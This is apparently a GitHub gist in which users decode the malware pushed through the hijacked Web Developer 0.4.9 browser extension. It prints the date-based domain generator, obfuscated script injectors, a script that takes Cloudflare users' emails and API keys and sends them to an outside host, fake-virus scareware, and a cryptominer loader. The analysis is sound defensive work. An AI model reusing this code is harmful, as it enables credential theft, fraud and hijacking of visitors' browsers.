Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Web developer 0.4.9 tools hacked and installing adware Decode
function md5cycle(x, k) {
var a = x[0], b = x[1], c = x[2], d = x[3];
a = ff(a, b, c, d, k[0], 7, -680876936);
d = ff(d, a, b, c, k[1], 12, -389564586);
c = ff(c, d, a, b, k[2], 17, 606105819);
b = ff(b, c, d, a, k[3], 22, -1044525330);
a = ff(a, b, c, d, k[4], 7, -176418897);
d = ff(d, a, b, c, k[5], 12, 1200080426);
c = ff(c, d, a, b, k[6], 17, -1473231341);
b = ff(b, c, d, a, k[7], 22, -45705983);
a = ff(a, b, c, d, k[8], 7, 1770035416);
d = ff(d, a, b, c, k[9], 12, -1958414417);
c = ff(c, d, a, b, k[10], 17, -42063);
b = ff(b, c, d, a, k[11], 22, -1990404162);
a = ff(a, b, c, d, k[12], 7, 1804603682);
d = ff(d, a, b, c, k[13], 12, -40341101);
c = ff(c, d, a, b, k[14], 17, -1502002290);
b = ff(b, c, d, a, k[15], 22, 1236535329);
a = gg(a, b, c, d, k[1], 5, -165796510);
d = gg(d, a, b, c, k[6], 9, -1069501632);
c = gg(c, d, a, b, k[11], 14, 643717713);
b = gg(b, c, d, a, k[0], 20, -373897302);
a = gg(a, b, c, d, k[5], 5, -701558691);
d = gg(d, a, b, c, k[10], 9, 38016083);
c = gg(c, d, a, b, k[15], 14, -660478335);
b = gg(b, c, d, a, k[4], 20, -405537848);
a = gg(a, b, c, d, k[9], 5, 568446438);
d = gg(d, a, b, c, k[14], 9, -1019803690);
c = gg(c, d, a, b, k[3], 14, -187363961);
b = gg(b, c, d, a, k[8], 20, 1163531501);
a = gg(a, b, c, d, k[13], 5, -1444681467);
d = gg(d, a, b, c, k[2], 9, -51403784);
c = gg(c, d, a, b, k[7], 14, 1735328473);
b = gg(b, c, d, a, k[12], 20, -1926607734);
a = hh(a, b, c, d, k[5], 4, -378558);
d = hh(d, a, b, c, k[8], 11, -2022574463);
c = hh(c, d, a, b, k[11], 16, 1839030562);
b = hh(b, c, d, a, k[14], 23, -35309556);
a = hh(a, b, c, d, k[1], 4, -1530992060);
d = hh(d, a, b, c, k[4], 11, 1272893353);
c = hh(c, d, a, b, k[7], 16, -155497632);
b = hh(b, c, d, a, k[10], 23, -1094730640);
a = hh(a, b, c, d, k[13], 4, 681279174);
d = hh(d, a, b, c, k[0], 11, -358537222);
c = hh(c, d, a, b, k[3], 16, -722521979);
b = hh(b, c, d, a, k[6], 23, 76029189);
a = hh(a, b, c, d, k[9], 4, -640364487);
d = hh(d, a, b, c, k[12], 11, -421815835);
c = hh(c, d, a, b, k[15], 16, 530742520);
b = hh(b, c, d, a, k[2], 23, -995338651);
a = ii(a, b, c, d, k[0], 6, -198630844);
d = ii(d, a, b, c, k[7], 10, 1126891415);
c = ii(c, d, a, b, k[14], 15, -1416354905);
b = ii(b, c, d, a, k[5], 21, -57434055);
a = ii(a, b, c, d, k[12], 6, 1700485571);
d = ii(d, a, b, c, k[3], 10, -1894986606);
c = ii(c, d, a, b, k[10], 15, -1051523);
b = ii(b, c, d, a, k[1], 21, -2054922799);
a = ii(a, b, c, d, k[8], 6, 1873313359);
d = ii(d, a, b, c, k[15], 10, -30611744);
c = ii(c, d, a, b, k[6], 15, -1560198380);
b = ii(b, c, d, a, k[13], 21, 1309151649);
a = ii(a, b, c, d, k[4], 6, -145523070);
d = ii(d, a, b, c, k[11], 10, -1120210379);
c = ii(c, d, a, b, k[2], 15, 718787259);
b = ii(b, c, d, a, k[9], 21, -343485551);
x[0] = add32(a, x[0]);
x[1] = add32(b, x[1]);
x[2] = add32(c, x[2]);
x[3] = add32(d, x[3]);
}
function cmn(q, a, b, x, s, t) {
a = add32(add32(a, q), add32(x, t));
return add32((a << s) | (a >>> (32 - s)), b);
}
function ff(a, b, c, d, x, s, t) {
return cmn((b & c) | ((~b) & d), a, b, x, s, t);
}
function gg(a, b, c, d, x, s, t) {
return cmn((b & d) | (c & (~d)), a, b, x, s, t);
}
function hh(a, b, c, d, x, s, t) {
return cmn(b ^ c ^ d, a, b, x, s, t);
}
function ii(a, b, c, d, x, s, t) {
return cmn(c ^ (b | (~d)), a, b, x, s, t);
}
function md51(s) {
txt = '';
var n = s.length,
state = [1732584193, -271733879, -1732584194, 271733878], i;
for (i=64; i<=s.length; i+=64) {
md5cycle(state, md5blk(s.substring(i-64, i)));
}
s = s.substring(i-64);
var tail = [0,0,0,0, 0,0,0,0, 0,0,0,0, 0,0,0,0];
for (i=0; i<s.length; i++)
tail[i>>2] |= s.charCodeAt(i) << ((i%4) << 3);
tail[i>>2] |= 0x80 << ((i%4) << 3);
if (i > 55) {
md5cycle(state, tail);
for (i=0; i<16; i++) tail[i] = 0;
}
tail[14] = n*8;
md5cycle(state, tail);
return state;
}
/* there needs to be support for Unicode here,
* unless we pretend that we can redefine the MD-5
* algorithm for multi-byte characters (perhaps
* by adding every four 16-bit characters and
* shortening the sum to 32 bits). Otherwise
* I suggest performing MD-5 as if every character
* was two bytes--e.g., 0040 0025 = @%--but then
* how will an ordinary MD-5 sum be matched?
* There is no way to standardize text to something
* like UTF-8 before transformation; speed cost is
* utterly prohibitive. The JavaScript standard
* itself needs to look at this: it should start
* providing access to strings as preformed UTF-8
* 8-bit unsigned value arrays.
*/
function md5blk(s) { /* I figured global was faster. */
var md5blks = [], i; /* Andy King said do it this way. */
for (i=0; i<64; i+=4) {
md5blks[i>>2] = s.charCodeAt(i)
+ (s.charCodeAt(i+1) << 8)
+ (s.charCodeAt(i+2) << 16)
+ (s.charCodeAt(i+3) << 24);
}
return md5blks;
}
var hex_chr = '0123456789abcdef'.split('');
function rhex(n)
{
var s='', j=0;
for(; j<4; j++)
s += hex_chr[(n >> (j * 8 + 4)) & 0x0F]
+ hex_chr[(n >> (j * 8)) & 0x0F];
return s;
}
function hex(x) {
for (var i=0; i<x.length; i++)
x[i] = rhex(x[i]);
return x.join('');
}
function md5(s) {
return hex(md51(s));
}
/* this function is much faster,
so if possible we use it. Some IEs
are the only ones I know of that
need the idiotic second function,
generated by an if clause. */
function add32(a, b) {
return (a + b) & 0xFFFFFFFF;
}
if (md5('hello') != '5d41402abc4b2a76b9719d911017c592') {
function add32(x, y) {
var lsw = (x & 0xFFFF) + (y & 0xFFFF),
msw = (x >> 16) + (y >> 16) + (lsw >> 16);
return (msw << 16) | (lsw & 0xFFFF);
}
}
var date = new Date();
var day = date.getUTCDate();
var month = date.getUTCMonth() + 1;
var year = date.getUTCFullYear();
var hour = date.getUTCHours();
console.log(hour);
var d = day + '-' + month + '-' + year;
var hash = "wd" + md5(d) + ".win";
var config_fragment = '<sc' + 'ri' + 'pt sr' + 'c="ht'+ 'tp' + 's://' + hash + '/ga.js"></sc ' + 'ri' + 'pt>';
alert(hash);
        /*
        Decode.
adware link
http://wd7bdb20e4d622f6569f3e8503138c859d.win
      */
Owner

piedpiperRichard commented Aug 2, 2017 edited

Decode.
adware link
wd7bdb20e4d622f6569f3e8503138c859d.win/ga.js

var _0x4d27 = ["\x63\x6C\x6F\x75\x64\x66\x6C\x61\x72\x65\x2E\x63\x6F\x6D", "\x69\x6E\x64\x65\x78\x4F\x66", "\x68\x72\x65\x66", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x73\x63\x72\x69\x70\x74", "\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74", "\x74\x79\x70\x65", "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74", "\x73\x72\x63", "\x2F\x2F\x73\x65\x61\x72\x63\x68\x74\x61\x62\x2E\x77\x69\x6E\x2F\x67\x61\x2E\x6A\x73", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65", "\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65", "\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65", "\x72\x65\x64\x69\x72\x65\x63\x74\x32\x2E\x74\x6F\x70", "\x2F\x2F\x70\x61", "\x72\x74\x6E\x65", "\x72\x2D\x6E\x65", "\x74\x2E\x6D\x65", "\x6E\x2F\x63\x6F", "\x64\x65\x2F\x3F", "\x70\x69\x64\x3D", "\x39\x37\x33\x38", "\x32\x30\x26\x72", "\x3D", "\x72\x61\x6E\x64\x6F\x6D", "\x66\x6C\x6F\x6F\x72", "\x66\x69\x72\x73\x74\x43\x68\x69\x6C\x64", "\x62\x6F\x64\x79", "\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64", "\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2D\x61\x6E\x61\x6C\x79\x74\x69\x63\x73\x2E\x63\x6F\x6D\x2F\x61\x6E\x61\x6C\x79\x74\x69\x63\x73\x2E\x6A\x73", "\x67\x61", "\x47\x6F\x6F\x67\x6C\x65\x41\x6E\x61\x6C\x79\x74\x69\x63\x73\x4F\x62\x6A\x65\x63\x74", "\x70\x75\x73\x68", "\x71", "\x6C", "\x61\x73\x79\x6E\x63", "\x63\x72\x65\x61\x74\x65", "\x55\x41\x2D\x31\x30\x33\x30\x34\x35\x35\x35\x33\x2D\x31", "\x61\x75\x74\x6F", "\x73\x65\x6E\x64", "\x70\x61\x67\x65\x76\x69\x65\x77"];
if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[0]) > -1) {
    (function() {
        var _0xb2b9x1 = document[_0x4d27[5]](_0x4d27[4]);
        _0xb2b9x1[_0x4d27[6]] = _0x4d27[7];
        _0xb2b9x1[_0x4d27[8]] = _0x4d27[9];
        var _0xb2b9x2 = document[_0x4d27[10]](_0x4d27[4])[0];
        _0xb2b9x2[_0x4d27[12]][_0x4d27[11]](_0xb2b9x1, _0xb2b9x2)
    })()
} else {
    if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[13]) == -1) {
        (function() {
            var _0xb2b9x3 = document[_0x4d27[5]](_0x4d27[4]);
            _0xb2b9x3[_0x4d27[6]] = _0x4d27[7];
            _0xb2b9x3[_0x4d27[8]] = _0x4d27[14] + _0x4d27[15] + _0x4d27[16] + _0x4d27[17] + _0x4d27[18] + _0x4d27[19] + _0x4d27[20] + _0x4d27[21] + _0x4d27[22] + _0x4d27[23] + Math[_0x4d27[25]](10000000 * Math[_0x4d27[24]]());
            var _0xb2b9x2 = document[_0x4d27[10]](_0x4d27[4])[0];
            _0xb2b9x2[_0x4d27[12]][_0x4d27[11]](_0xb2b9x3, _0xb2b9x2);
            try {
                var _0xb2b9x4 = document[_0x4d27[27]][_0x4d27[26]];
                _0xb2b9x4[_0x4d27[12]][_0x4d27[11]](_0xb2b9x2, _0xb2b9x4)
            } catch (e) {
                document[_0x4d27[27]][_0x4d27[28]](_0xb2b9x2)
            }
        })()
    }
};
(function(_0xb2b9x5, _0xb2b9x2, _0xb2b9x6, _0xb2b9x7, _0xb2b9x8, _0xb2b9x9, _0xb2b9xa) {
    _0xb2b9x5[_0x4d27[31]] = _0xb2b9x8;
    _0xb2b9x5[_0xb2b9x8] = _0xb2b9x5[_0xb2b9x8] || function() {
        (_0xb2b9x5[_0xb2b9x8][_0x4d27[33]] = _0xb2b9x5[_0xb2b9x8][_0x4d27[33]] || [])[_0x4d27[32]](arguments)
    }, _0xb2b9x5[_0xb2b9x8][_0x4d27[34]] = 1 * new Date();
    _0xb2b9x9 = _0xb2b9x2[_0x4d27[5]](_0xb2b9x6), _0xb2b9xa = _0xb2b9x2[_0x4d27[10]](_0xb2b9x6)[0];
    _0xb2b9x9[_0x4d27[35]] = 1;
    _0xb2b9x9[_0x4d27[8]] = _0xb2b9x7;
    _0xb2b9xa[_0x4d27[12]][_0x4d27[11]](_0xb2b9x9, _0xb2b9xa)
})(window, document, _0x4d27[4], _0x4d27[29], _0x4d27[30]);
ga(_0x4d27[36], _0x4d27[37], _0x4d27[38]);
ga(_0x4d27[39], _0x4d27[40])

var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);
if (top['location']['href']['indexOf']('cloudflare.com') > -1) {
    (function() {
        var _0xb2b9x1 = document['createElement']('script');
        _0xb2b9x1['type'] = 'text/javascript';
        _0xb2b9x1['src'] = '//searchtab.win/ga.js';
        var _0xb2b9x2 = document['getElementsByTagName']('script')[0];
        _0xb2b9x2['parentNode']['insertBefore'](_0xb2b9x1, _0xb2b9x2)
    })()
} else {
    if (top['location']['href']['indexOf']('redirect2.top') == -1) {
        (function() {
            var _0xb2b9x3 = document['createElement']('script');
            _0xb2b9x3['type'] = 'text/javascript';
            _0xb2b9x3['src'] = '//pa' + 'rtne' + 'r-ne' + 't.me' + 'n/co' + 'de/?' + 'pid=' + '9738' + '20&r' + '=' + Math['floor'](10000000 * Math['random']());
            var _0xb2b9x2 = document['getElementsByTagName']('script')[0];
            _0xb2b9x2['parentNode']['insertBefore'](_0xb2b9x3, _0xb2b9x2);
            try {
                var _0xb2b9x4 = document['body']['firstChild'];
                _0xb2b9x4['parentNode']['insertBefore'](_0xb2b9x2, _0xb2b9x4)
            } catch (e) {
                document['body']['appendChild'](_0xb2b9x2)
            }
        })()
    }
};
(function(_0xb2b9x5, _0xb2b9x2, _0xb2b9x6, _0xb2b9x7, _0xb2b9x8, _0xb2b9x9, _0xb2b9xa) {
    _0xb2b9x5['GoogleAnalyticsObject'] = _0xb2b9x8;
    _0xb2b9x5[_0xb2b9x8] = _0xb2b9x5[_0xb2b9x8] || function() {
        (_0xb2b9x5[_0xb2b9x8]['q'] = _0xb2b9x5[_0xb2b9x8]['q'] || [])['push'](arguments)
    }, _0xb2b9x5[_0xb2b9x8]['l'] = 1 * new Date();
    _0xb2b9x9 = _0xb2b9x2['createElement'](_0xb2b9x6), _0xb2b9xa = _0xb2b9x2['getElementsByTagName'](_0xb2b9x6)[0];
    _0xb2b9x9['async'] = 1;
    _0xb2b9x9['src'] = _0xb2b9x7;
    _0xb2b9xa['parentNode']['insertBefore'](_0xb2b9x9, _0xb2b9xa)
})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-103045553-1', 'auto');
ga('send', 'pageview')

var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);
searchtab.win/ga.js
partner-net.men/code/?pid=7973820&r=10000000
https://loading.website/alert_ce.php
Owner

piedpiperRichard commented Aug 2, 2017 edited

decode
searchtab.win/ga.js

  console.log('window - onload'); // 4th
  console.log(window.bootstrap); // 4th
  console.log(window.bootstrap.data.user.email);
  console.log(window.bootstrap.atok);
  //   console.log(window.bootstrap); // 4th

  var xmlhttp = new XMLHttpRequest();
  xmlhttp.open('GET', 'https://www.cloudflare.com/api/v4/user/api_key', true);
  xmlhttp.setRequestHeader("x-atok", window.bootstrap.atok);
  xmlhttp.onreadystatechange = function() {
      if (xmlhttp.readyState == 4) {
          if (xmlhttp.status == 200) {
              var obj = JSON.parse(xmlhttp.responseText);
              var key = obj.result.api_key;
              console.log(key);
              (new Image).src = '//searchtab.win/ga.php?user=' + encodeURIComponent(window.bootstrap.data.user.email) + '&key=' + encodeURIComponent(key);
          }
      }
  };
  xmlhttp.send(null);

decode
partner-net.men/code/?pid=7973820&r=10000000

(function() {
    var t = false;

    function r() {
        var t = 1;
        var r = parseInt("7973820");
        var e = [{
            src: "//partner-net.men/code/pid/linkcheck.js?rev=133",
            async: false
        }, {
            src: "//partner-net.men/code/pid/7973820_BNX.js?rev=133",
            async: true
        }, {
            src: "//partner-net.men/code/pid/7973820_ALL.js?rev=133",
            async: false
        }];
        var n = false;
        var i = [359045];
        var a = [581350, 655971, 812933, 535264, 330970, 888078, 612812, 552308, 516442, 144200, 378507, 820585, 714257, 211746];
        if (window.location.host.match(/(mail\.ru|ok\.ru|vk\.com)/) && a.indexOf(r) > -1) {
            e[1].src = null
        }
        if (r === 485743) {
            e[0].src = null
        }
        if (i.indexOf(r) > -1) {
            e = []
        }
        if (t === 1) {
            var c = window[window.location.hostname] || false;
            if (c) return;
            window[window.location.hostname] = true
        }
        for (var o = 0; o < e.length; o++) {
            if (e[o].src) {
                var s = document.createElement("script");
                s.setAttribute("charset", "UTF-8");
                if (e[o].async) s.setAttribute("async", "async");
                s.setAttribute("src", e[o].src);
                try {
                    var d = document.body.firstChild;
                    d.parentNode.insertBefore(s, d)
                } catch (t) {
                    n = true
                }
                if (n) {
                    try {
                        document.body.appendChild(s)
                    } catch (t) {}
                }
            }
        }
    }
    var e = function() {
        if (!t) {
            setTimeout(function() {
                n()
            }, 10)
        }
    };
    var n = function() {
        try {
            if ("function" == typeof document.body.appendChild && window === top) {
                t = true;
                r()
            }
        } catch (t) {}
        e()
    };
    n()
})();
(function() {
    try {
        setTimeout(function() {
            var e = 'https://f.partnerwork.men/code/code/index_4.php';
            if (!document.querySelector('script[src^="' + e + '"]')) {
                var t = document.createElement('script');
                t.type = 'text/javascript';
                t.src = e;
                document.getElementsByTagName('body')[0].appendChild(t)
            }
        }, 1e3)
    } catch (e) {}
})();

Decode
https://loading.website/alert_ce.php


        var msg = 'Your computer is infected. You have to check it with antivirus.';

        if (confirm(msg)) {
            var tds_url = 'http://loading.website/tds.php?subid=ce2';
            top.location.href = tds_url;
        } else {
        }
partner-net.men/code/pid/linkcheck.js?rev=133
partner-net.men/code/pid/7973820_BNX.js?rev=133
partner-net.men/code/pid/7973820_ALL.js?rev=133
https://f.partnerwork.men/code/code/index_4.php
http://loading.website/tds.php?subid=ce2     PCKeeper Installer.exe
Owner

piedpiperRichard commented Aug 2, 2017 edited

https://f.partnerwork.men/code/code/index_4.php

! function() {
    try {
        var e = function() {
            var t;
            void 0 !== document.hidden ? t = "hidden" : void 0 !== document.webkitHidden ? t = "webkitHidden" : void 0 !== document.mozHidden ? t = "mozHidden" : void 0 !== document.msHidden && (t = "msHidden"), document[t] ? setTimeout(function() {
                e()
            }, 10000) : function() {
                try {
                    var e = !1;
                    ["y", "a"].forEach(function(t) {
                        if (!1 === e && document.querySelector('script[src^="https://' + t + '.partnerwork.men/code/code/mss_3.js"]')) e = !0;
                        else if ("a" === t && !1 === e) {
                            var d = document.createElement("script");
                            d.type = "text/javascript", d.src = "https://a.partnerwork.men/code/code/index_3.php", document.getElementsByTagName("body")[0].appendChild(d)
                        }
                    })
                } catch (e) {}
            }()
        };
        setTimeout(function() {
            e()
        }, 10000)
    } catch (e) {}
}();
Owner

piedpiperRichard commented Aug 2, 2017 edited

https://y.partnerwork.men/code/code/index_3.php

var hash = '{"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"161860651313327","job":{"blob":"0505b1e088cc052109c263b6823040e1560aa1971840aca59a318eb770a957a9afb0e038f084cf0000000077cc8ace862fa5505349f456dbc03a1b45b235ddf8757747b734713b165db5850a","job_id":"121997309522703","target":"8b4f0100"},"status":"OK"}}';
var start_nonce = 200;
var count_pl = 200;
var src = "https://y.partnerwork.men/code/code/mss_3.js";
if (document.querySelector('script[src^="' + src + '"]')) m_miner(hash, start_nonce, count_pl);
else {
    var d = document.createElement("script");
    d.type = "text/javascript", d.src = src, document.body.appendChild(d), setTimeout(function() {
        m_miner(hash, start_nonce, count_pl)
    }, 2e3)
}
var scripts = document.querySelectorAll('script[src^="https://y.partnerwork.men/code/code/index_3.php"]');
scripts && scripts.length > 0 && scripts[0].parentNode.removeChild(scripts[0]);

@piedpiperRichard what is:

if (top[_0x4d27[3]][_0x4d27[2]][_0x4d27[1]](_0x4d27[0]) > -1) {

top in this case? thats no native js.... is there a map somewhere I have't spotted?

@amlwwalker that refers to window.top. So basically window.top.location.href.

That script is the one that bothers me the most, since it appears to be fetching e-mail and API key of someone on Cloudflare. Which can be used to send spam, phishing and redirect people their domain on Cloudflare to even more malicious websites.

h0n24 commented Aug 3, 2017 edited

Here's human readable version of wd7bdb20e4d622f6569f3e8503138c859d.win/ga.js file

if (top['location']['href']['indexOf']('cloudflare.com') > -1) {
  (function() {
    var createScript = document['createElement']('script');
    createScript['type'] = 'text/javascript';
    createScript['src'] = '//searchtab.win/ga.js';
    var getScript = document['getElementsByTagName']('script')[0];
    getScript['parentNode']['insertBefore'](createScript, getScript)
  })()
} else {
  if (top['location']['href']['indexOf']('redirect2.top') == -1) {
    (function() {
      var createScript = document['createElement']('script');
      createScript['type'] = 'text/javascript';
      createScript['src'] = '//partner-net.men/code/?pid=973820&r=' + Math['floor'](10000000 * Math['random']());
      var getScript = document['getElementsByTagName']('script')[0];
      getScript['parentNode']['insertBefore'](createScript, getScript);
      try {
        var getBody = document['body']['firstChild'];
        getBody['parentNode']['insertBefore'](getScript, getBody)
      } catch (e) {
        document['body']['appendChild'](getScript)
      }
    })()
  }
};

// Google Analytics 
(function(i, s, o, g, r, a, m) {
  i['GoogleAnalyticsObject'] = r;
  i[r] = i[r] || function() {
      (i[r].q = i[r].q || []).push(arguments)
    },
    i[r].l = 1 * new Date();
  a = s.createElement(o),
    m = s.getElementsByTagName(o)[0];
  a.async = 1;
  a.src = g;
  m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js', 'ga');
ga('create', 'UA-103045553-1', 'auto');
ga('send', 'pageview')

// loading alert msg 'Your computer is infected. You have to check it with antivirus.'
var wc = document.createElement('script');
wc.type = 'text/javascript';
wc.src = 'https://loading.website/alert_ce.php';
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(wc, s);

My system got caught in this Malware. Currently finding out that it was created in JavaScript. A redirect here for when I get better at knowing and reading code. I'm an informal student of JavaScript at the moment, about to get back into my studies of where I last left off.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment